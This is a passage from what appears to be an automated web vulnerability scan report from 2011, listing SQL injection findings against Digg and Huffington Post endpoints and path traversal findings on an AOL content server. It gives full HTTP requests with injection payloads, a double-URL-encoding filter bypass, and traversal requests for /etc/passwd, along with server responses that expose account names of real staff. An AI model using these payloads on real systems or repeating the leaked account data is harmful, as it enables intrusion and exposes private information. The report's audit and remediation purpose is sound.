V=[E,"/_cqr/login/login.psp?uitype=popup&sitedomain=",x,"&lang=",H,"&locale=",A,O?"&st="+O:"","&siteState=",D].join(""),W=[B,"/auth/login?devId=",j(z),M.length===1?"&idType="+M.toString():"&supportedIdType="+M.join(","),O?"&st="+O:"","&language=",H+"-"+A,"&f=qs&succUrl=",j(r)].join("");g.openWindow(x?V:W,{width:528,height:G?530:395})}function J(V){b=0;V.preventDefault();var U=[B,"/auth/logout?devId=",j(z),"&a=",j(d),"&language=",H+"-"+A,"&f=json&succUrl=",j(r),"&doSNSLogout=1"].join("");if(k){g.openWindow(U,{width:528,height:G?530:395,focus:0});i.focus()}else{g("<iframe/>").attr("src",U).css({border:0,margin:0,width:0,height:0}).appendTo("body")}}var K=R.response,L=parseInt(K.statusCode,10),M=S.tabs,O=S.selectedTab,I,Q="click.ma";if(L===200){var P=R.response.data.userData.attributes,N;if(!P.pictureUrl){N=P.providerDisplayName;if(!N||N==="Aol"||N==="Aim"){P.pictureUrl="http://expapi.oscar.aol.com/expressions/get?f=native&type=buddyIcon&t="+P.loginId}}f.trigger("token-success."+v,{key:z,response:R.
...[SNIP]...

Request 2

GET /os_merge/?file=/aol/jquery-1.4.3.min.js&file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.truncate-1.0.min.js&file=/aol/jquery.openwindow-1.0.min.js&file=/aol/jquery.shorturl.min.js&file=/aol/jquery.aolshare.debug.min.js&file=/aol/jquery.multiauth-1.0.min.js'%20and%201%3d2--%20&file=/aol/jquery.globalheader-1.5.min.js&file=/aol/jquery.globalsearchbox-1.5.min.js&file=/aol/aol.relatedvideo.min.js&file=/music/js/delegate.js&file=/music/js/jquery.twitter.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js&file=/aol/jquery.aolmostpopular.min.js&file=/music/js/feedback.js&file=/music/js/artist-legacy-hubs.js&v=5 HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/radioguide/bb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 18 Apr 2011 14:47:44 GMT
Content-Type: application/javascript
Cache-Control: public, max-age=3600
Expires: Thu, 05 May 2011 02:18:23 GMT
Date: Thu, 05 May 2011 01:18:23 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 118535

/*!
* jQuery JavaScript Library v1.4.3
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...
;U.devId=(f.aolGetAuthToken.devId||devId);o(U)}})})}});n.replaceWith(G)}};f.fn.aolShare=function(l){return this.each(function(){l=l||{};l.elem=this;f.aolShare(l)})}})(jQuery,window,document);(function(a){a.fn.globalHeader=function(i){var d={activeTab:null,dualSearchBox:true,moreLinks:[],morePromoCount:2,moreText:"You might also like:",moreAnd:"and",moreMore:"More",moreTextHeadline:"More Sites You Might Like",webBaseUrl:"http://search.aol.com/aol/",webInv:"hdt-spinner",uiHat:"#head",uiWebForm:"#aol-header-search-form",uiWebInput:"#aol-header-search-input",uiWebButton:"#aol-header-search-icon",uiHatLinks:"#aol-header-links",uiHatTools:"#aol-header-auth-link",uiHatMorePopup:"#aol-header-more-list",uiNavLi:"li.nav-category",uiNavADd:".ad-728-90",auth:{doAuth:false,authenticated:false,authState:null,unauthState:null},search:{uiSearch:"#aol-header-search",params:{}},fn:{}},j={},f=this,g={},h={activeTab:null,moreLinksBuilt:false},c={init:function(k){g.$d=a(document);g.$c=a(k);g.hat=a(j.uiHat)[0];g.hatLinks=a(j.uiHatLinks)[0];g.$hatTools=a(j.uiHatTools);g.$webSearchForm=a(j.uiWebForm);g.$webSearchInput=a(j.uiWebInput);g.$webSearchButton=a(j.uiWebButton);g.$search=a(j.search.uiSearch);g.$searchInput=g.$search.find("input:first");g.$searchSubmit=g.$search.find("input:last");g.$navLi=g.$c.find(j.uiNavLi);g.$navADd=g.$c.find(j.uiNavADd);g.$hatMoreList=a(j.uiHatMorePopup);c.setActiveTab(null,j.activeTab);if(j.auth.doAuth){c.buildAuth()}if(j.dualSearchBox){b()}c.buildMoreLinks();c.buildDropDowns();g.$c.bind("setActiveTab",function(m,l){c.setActiveTab(m,l)});g.$c.bind("setAuthState",function(m,l){c.buildAuth(m,l)});if(j.search.params.initFocus!==undefined&&j.search.params.initFocus){g.$search.globalSearchBox(j.search.params)}else{g.$searchInput.bind("focus.aol-header",function(l){c.buildSearch(l)}).attr("autocomplete","off");g.$searchSubmit.bind("mouseover.aol-header",function(l){c.buildSearch(l)});if(j.search.params.searchText!==undefined&&j.search.params.searchText!==""){g.$searchInput.val(j.search.params.searchText)}}if(j.search.params.useCustomQuery===true){g.$searchInput.after('<input id="search-customvar" type="hidden" name="'+j.search.params.customQueryName+'" value="'+j
...[SNIP]...

1.11. http://widgets.digg.com/buttons/count [url parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://widgets.digg.com
Path:	/buttons/count

Issue detail

The url parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the url parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the url request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /buttons/count?url=http%3A//techcrunch.com/2011/05/04/mashery-funding-2/%2527 HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=fb1af30888f0820a9f09d171b75eb93394e3b17bd833ffed352d5b5c4836e393; __utmz=146621099.1304250250.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vnum=1306842255367%26vn%3D1; s_vi=[CS]v1|26DEA3D10501174B-40000100A00037A2[CE]; __utma=146621099.2000529129.1304250250.1304250250.1304250250.1; s_nr=1304250295878

Response 1

HTTP/1.1 503 Service Unavailable
Content-Length: 62
Accept-Ranges: bytes
Date: Thu, 05 May 2011 01:23:55 GMT
Cache-Control: private, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-CDN: Cotendo
Connection: Keep-Alive

<html><body><b>Http/1.1 Service Unavailable</b></body> </html>

Request 2

GET /buttons/count?url=http%3A//techcrunch.com/2011/05/04/mashery-funding-2/%2527%2527 HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=fb1af30888f0820a9f09d171b75eb93394e3b17bd833ffed352d5b5c4836e393; __utmz=146621099.1304250250.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vnum=1306842255367%26vn%3D1; s_vi=[CS]v1|26DEA3D10501174B-40000100A00037A2[CE]; __utma=146621099.2000529129.1304250250.1304250250.1304250250.1; s_nr=1304250295878

Response 2

HTTP/1.1 200 OK
Age: 0
Date: Thu, 05 May 2011 01:23:56 GMT
Via: NS-CACHE: 100
Etag: "54018d3f1db7e92a658590f8fbfc22adc1e471c2"
Content-Length: 101
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Thu, 05 May 2011 01:33:55 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "http://techcrunch.com/2011/05/04/mashery-funding-2/%27%27", "diggs": 0});

1.12. http://www.huffingtonpost.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.huffingtonpost.com
Path:	/

Issue detail

Request 1

GET /?icid=navbar_huffpo_main5&1%20and%201%3d1--%20=1 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=28
Date: Thu, 05 May 2011 01:16:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 268691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
HPAds.ads_client_info() + ';load_mode=inline;page_type=homepage;pos=pushdown;dcopt=ist;u=970x418|homepage|pushdown|||' + HPAds.ads_u_value() + '||||' + HPAds.ads_inf_value() + ';sz=970x418;tile=1;ord=47570434?"></scr' + 'ipt>';
                       if(HuffCookies.getCookie('is_aol_user')=="1" && ad_code.match(/mid_article/gi))
                       {
                           var adSonarArray = {
                               'default':[1517286,2255770],
                               'entertainment':[1517280,2259767],
                               'politics':[1517131,2259768],
                               'business':[1517131,2259768],
                               'sports':[1517295,2259769],
                               'travel':[1517304,2259770]
                               }
                               document.write('<style type=\"text/css\">#ad_mid_article {float:left;width:300px;margin:10px 10px 10px 0} .mid_article_ad_label {display:none} #mid_article_deco {border:none;margin:0;padding:0}</style>');
                               if(adSonarArray[HPConfig.current_vertical_name]){
                                   HPAds.adSonar(adSonarArray[HPConfig.current_vertical_name][0],adSonarArray[HPConfig.current_vertical_name][1],300,250)
                               }
                               else{
                                   HPAds.adSonar(adSonarArray['default'][0],adSonarArray['default'][1],300,250)
                               }
                       }
    else if(!(HuffCookies.getCookie('is_aol_user')=="1" && (ad_code.match(/left_lower/gi) || ad_code.match(/pushdown/gi) || ad_code.match(/curtain/gi) )))
{
   document.write(supress_keyvalues(ks, ad_code));
}
var debugadcode = '';
document.write(debugadcode);
}
</script></div> <script type="text/javascript">
QV.place_quickread_ads = true;
</script>

<div class="main_big_news_ontop" id="topnav_big_news_module">

<div id="big_news_update">
<ul class="big_news_ontop">
<li ><a href="/big-news/#homepage" onclick="HPTrack.trackPageview('/t/a/topnav_bignews/v2');" class="title">BIG NEWS:</a></li>
<li><a href="/news/gingrich-2012" class="big_news_item first" onclick="HPTrack.trackPageview('/t/a/topnav_bignews/v2');">Gingrich 2012</a></li>
<li class='line'>|</li>
<li><a href="/news/elections-2012" class="big_news_item bn_v_politics" onclick="HPTrack.trackPageview('/t/a/top
...[SNIP]...

Request 2

GET /?icid=navbar_huffpo_main5&1%20and%201%3d2--%20=1 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=29
Date: Thu, 05 May 2011 01:16:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 268645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
HPAds.ads_client_info() + ';load_mode=inline;page_type=homepage;pos=pushdown;dcopt=ist;u=970x418|homepage|pushdown|||' + HPAds.ads_u_value() + '||||' + HPAds.ads_inf_value() + ';sz=970x418;tile=1;ord=78811701?"></scr' + 'ipt>';
                       if(HuffCookies.getCookie('is_aol_user')=="1" && ad_code.match(/mid_article/gi))
                       {
                           var adSonarArray = {
                               'default':[1517286,2255770],
                               'entertainment':[1517280,2259767],
                               'politics':[1517131,2259768],
                               'business':[1517131,2259768],
                               'sports':[1517295,2259769],
                               'travel':[1517304,2259770]
                               }
                               document.write('<style type=\"text/css\">#ad_mid_article {float:left;width:300px;margin:10px 10px 10px 0} .mid_article_ad_label {display:none} #mid_article_deco {border:none;margin:0;padding:0}</style>');
                               if(adSonarArray[HPConfig.current_vertical_name]){
                                   HPAds.adSonar(adSonarArray[HPConfig.current_vertical_name][0],adSonarArray[HPConfig.current_vertical_name][1],300,250)
                               }
                               else{
                                   HPAds.adSonar(adSonarArray['default'][0],adSonarArray['default'][1],300,250)
                               }
                       }
    else if(!(HuffCookies.getCookie('is_aol_user')=="1" && (ad_code.match(/left_lower/gi) || ad_code.match(/pushdown/gi) || ad_code.match(/curtain/gi) )))
{
   document.write(supress_keyvalues(ks, ad_code));
}
var debugadcode = '';
document.write(debugadcode);
}
</script></div> <script type="text/javascript">
QV.place_quickread_ads = true;
</script>

<div class="main_big_news_ontop" id="topnav_big_news_module">

<div id="big_news_update">
<ul class="big_news_ontop">
<li ><a href="/big-news/#homepage" onclick="HPTrack.trackPageview('/t/a/topnav_bignews/v2');" class="title">BIG NEWS:</a></li>
<li><a href="/news/gingrich-2012" class="big_news_item first" onclick="HPTrack.trackPageview('/t/a/topnav_bignews/v2');">Gingrich 2012</a></li>
<li class='line'>|</li>
<li><a href="/news/elections-2012" class="big_news_item bn_v_politics" onclick="HPTrack.trackPageview('/t/a/top
...[SNIP]...

1.13. http://www.huffingtonpost.com/threeup.php [v parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.huffingtonpost.com
Path:	/threeup.php

Issue detail

The v parameter appears to be vulnerable to SQL injection attacks. The payloads 83591090'%20or%201%3d1--%20 and 83591090'%20or%201%3d2--%20 were each submitted in the v parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /threeup.php?threeup=yes&VerticalName=World&entry_id=857568&v=183591090'%20or%201%3d1--%20&h=0 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; s_pers=%20s_getnr%3D1304575172633-New%7C1367647172633%3B%20s_nrgvo%3DNew%7C1367647172635%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.10.10.1304575105; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 05 May 2011 01:30:40 GMT
Connection: close
Content-Length: 7160

       <div id="857693" class="grid third flush_top threeup_entries">
           <div id="entry_857693" class="entry no_border">
               <div class="image_wrapper"><a href="http://www.huffingtonpost.com/2011/05/04/libya-government-shelling_n_857693.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');">            <img src="http://i.huffpost.com/gen/273918/thumbs/r-LIBYA-INTERNATIONAL-AID-medium260.jpg" border="0" width="260" height="75" alt="" />        </a></div>
               <h5><a href="http://www.huffingtonpost.com/2011/05/04/libya-government-shelling_n_857693.html" class="threeup_titles block margin_0_20" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');">LIBYA TARGETS AID SHIP</a></h5>
           </div>
       </div>        <div id="857719" class="grid third flush_top threeup_entries">
           <div id="entry_857719" class="entry no_border">
               <div class="image_wrapper"><a href="http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-photos_n_857719.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');">            <img src="http://i.huffpost.com/gen/273951/thumbs/r-OSAMA-BIN-LADEN-PHOTOS-medium260.jpg" border="0" width="260" height="75" alt="" />        </a></div>
               <h5><a href="http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-photos_n_857719.html" class="threeup_titles block margin_0_20" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');">GRAPHIC: Photos Show 3 Dead Men At Bin Laden Compound</a></h5>
           </div>
       </div>        <div id="857555" class="grid third flush_top threeup_entries">
           <div id="entry_857555" class="entry no_border">
               <div class="image_wrapper"><a href="http://www.huffingtonpost.com/2011/05/04/afghanistan-pakistan-bin-laden_n_857555.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');">            <img src="http://i.huffpost.com/gen/273798/thumbs/r-AFGHANISTAN-PAKISTAN-BIN-LADEN-medium260.jpg" border="0" width="260" height="75" alt="" />        </a></div>
               <h5><a href="http://www.huffingtonpost.com/2011/05/04/afghan
...[SNIP]...

Request 2

GET /threeup.php?threeup=yes&VerticalName=World&entry_id=857568&v=183591090'%20or%201%3d2--%20&h=0 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; s_pers=%20s_getnr%3D1304575172633-New%7C1367647172633%3B%20s_nrgvo%3DNew%7C1367647172635%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.10.10.1304575105; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 05 May 2011 01:30:40 GMT
Connection: close
Content-Length: 6018

       <div id="857597" class="grid third flush_top threeup_entries">
           <div id="entry_857597" class="entry no_border">
               <div class="image_wrapper"><a href="http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html?ir=World" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v2/World');">            <img src="http://i.huffpost.com/gen/273847/thumbs/r-BIN-LADEN-medium260.jpg" border="0" width="260" height="75" alt="" />        </a></div>
               <h5><a href="http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html?ir=World" class="threeup_titles block margin_0_20" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v2/World');">CNN Poll Finds That Most People Think Bin Laden Is In Hell</a></h5>
           </div>
       </div>        <div id="entry_threeup_central" class="grid third flush_top threeup_entries">
           <div id="entry_threeup_central_inner" class="entry no_border world">
               <div class="image_wrapper">                    <a href="/world/" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v2/World');"><img src="http://i.huffpost.com/gen/273918/thumbs/s-LIBYA-INTERNATIONAL-AID-97x75.jpg" border=0 width=97 height=75 style="display:inline" /></a>                    <a href="/world/" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v2/World');"><img src="http://i.huffpost.com/gen/273951/thumbs/s-OSAMA-BIN-LADEN-PHOTOS-97x75.jpg" border=0 width=97 height=75 style="display:inline" /></a>                    <a href="/world/" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v2/World');"><img src="http://i.huffpost.com/gen/273798/thumbs/s-AFGHANISTAN-PAKISTAN-BIN-LADEN-97x75.jpg" border=0 width=97 height=75 style="display:inline" /></a>                </div>
               <h5><a href="/world/" target="_top">More In World:</a> <a href="/world/" target="_top" class="threeup_titles" onclick="HPTrack.trackPageview('/t/a/threeup.v2/World');">                    Libya Targets Aid Arrival...                    Bin Laden Raid Photos...                    Pakistan Had To Know?...                    </a>
               </h5>
           </div>
       </div>        <div id="857624" clas
...[SNIP]...

2. File path traversal previous next
There are 2 instances of this issue:

/art/merge [f parameter]
/art/merge/ [f parameter]

Issue background

File path traversal vulnerabilities arise when user-controllable data is used within a filesystem operation in an unsafe manner. Typically, a user-supplied filename is appended to a directory prefix in order to read or write the contents of a file. If vulnerable, an attacker can supply path traversal sequences (using dot-dot-slash characters) to break out of the intended directory and read or write files elsewhere on the filesystem.

This is usually a very serious vulnerability, enabling an attacker to access sensitive files containing configuration data, passwords, database records, log data, source code, and program scripts and binaries.

Issue remediation

Ideally, application functionality should be designed in such a way that user-controllable data does not need to be passed to filesystem operations. This can normally be achieved either by referencing known files via an index number rather than their name, and by using application-generated filenames to save user-supplied file content.

If it is considered unavoidable to pass user-controllable data to a filesystem operation, three layers of defence can be employed to prevent path traversal attacks:

User-controllable data should be strictly validated before being passed to any filesystem operation. In particular, input containing dot-dot sequences should be blocked.
After validating user input, the application can use a suitable filesystem API to verify that the file to be accessed is actually located within the base directory used by the application. In Java, this can be achieved by instantiating a java.io.File object using the user-supplied filename and then calling the getCanonicalPath method on this object. If the string returned by this method does not begin with the name of the start directory, then the user has somehow bypassed the applicationís input filters, and the request should be rejected. In ASP.NET, the same check can be performed by passing the user-supplied filename to the System.Io.Path.GetFullPath method and checking the returned string in the same way as described for Java.
The directory used to store files that are accessed using user-controllable data can be located on a separate logical volume to other sensitive application and operating system files, so that these cannot be reached via path traversal attacks. In Unix-based systems, this can be achieved using a chrooted filesystem; on Windows, this can be achieved by mounting the base directory as a new logical drive and using the associated drive letter to access its contents.

2.1. http://o.aolcdn.com/art/merge [f parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://o.aolcdn.com
Path:	/art/merge

Issue detail

The f parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload /_media/ch_music2/radio-legacy-music2.css../../../../../../../../etc/passwd was submitted in the f parameter. The requested file was returned in the application's response.

Request

GET /art/merge?f=/_media/ch_music2/radio-legacy-music2.css../../../../../../../../etc/passwd&f=/_media/ch_music2/radio-legacy-muscnwssponslnk2.css&f=/_media/ch_music2/radio-legacy-promobar.css&f=/_media/ch_music2/radio-legacy-feeds_subscribe_en_us.css&f=/_media/music_en_us_css/aol.music.header.css&f=/_media/music_en_us_css/aol.music.footer.css&expsec=31536000&ver=40 HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/radioguide/bb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Mime-Version: 1.0
Server: AOLserver/4.0.10
Content-Type: text/css; charset=iso8859-1
Vary: Accept-Encoding
Cache-Control: max-age=31536000
Expires: Fri, 04 May 2012 13:03:58 GMT
Date: Thu, 05 May 2011 13:03:58 GMT
Connection: close
Content-Length: 26142

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/adm:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin
...[SNIP]...
domo:x:91:91:majordomo mailing list:/usr/lib/majordomo:/bin/bash
quagga:x:92:92:quagga:/:/bin/false
dovecot:x:97:97:quagga:/usr/libexec/dovecot:/bin/false
gkrellmd:x:101:101:gkrellmd user:/:/bin/false
nobody:x:99:99:Nobody:/:/bin/false
altadmin:x:5996:1026:Local Technogy:/home/altadmin:/bin/ksh
ashishbh:x:9480:1026:Ashish Bhatt:/home/ashishbh:/bin/ksh
astevens:x:6694:1026:Andrew Stevens:/home/astevens:/bin
...[SNIP]...

2.2. http://o.aolcdn.com/art/merge/ [f parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://o.aolcdn.com
Path:	/art/merge/

Issue detail

The f parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload /mobileportal/s2c_modal.js../../../../../../../../etc/passwd was submitted in the f parameter. The requested file was returned in the application's response.

Request

GET /art/merge/?f=/mobileportal/s2c_modal.js../../../../../../../../etc/passwd&f=/mobileportal/mobile_s2c_init.js&f=/feedback/feedback1.js&f=/mobileportal/mobileblog_profile.js&xpsec=31536000&ver=1y HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/?icid=prodserv_mobile_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Mime-Version: 1.0
Server: AOLserver/4.0.10
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=86400
Expires: Fri, 06 May 2011 01:12:53 GMT
Date: Thu, 05 May 2011 01:12:53 GMT
Connection: close
Content-Length: 20992

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/adm:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/bin/false
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL da
...[SNIP]...

